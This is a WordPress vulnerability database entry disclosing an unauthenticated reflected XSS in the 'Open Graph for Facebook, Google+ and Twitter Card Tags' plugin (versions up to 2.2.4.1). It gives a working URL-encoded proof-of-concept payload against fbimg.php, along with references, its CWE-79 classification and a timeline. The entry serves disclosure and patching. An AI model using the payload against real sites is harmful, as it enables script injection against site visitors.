Open Graph for Facebook, Google+ and Twitter Card Tags <= 2.2.4.1 - Unauthenticated Cross-Site Scripting (XSS)



Proof of Concept
http://blog.tld/wp-content/plugins/wonderm00ns-simple-facebook-open-graph-tags/fbimg.php/?img=http://blog.tld/%3c%73%63%72%69%70%74%3ealert(document.domain)%3c%2f%73%63%72%69%70%74%3e

Affects Plugin

References

URL: https://plugins.trac.wordpress.org/browser/wonderm00ns-simple-facebook-open-graph-tags/trunk/fbimg.php?rev=1899976
URL: https://plugins.trac.wordpress.org/changeset/1899975/wonderm00ns-simple-facebook-open-graph-tags

Classification

Type: XSS
OWASP Top 10: A3: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Submitter: Thomas Chauchefoin
Views: 2032
Verified: No
WPVDB ID: 9103

Timeline

Publicly Published: 2018-06-27 (6 months ago)
Added: 2018-07-04 (5 months ago)
Last Updated: 2018-07-04 (5 months ago)
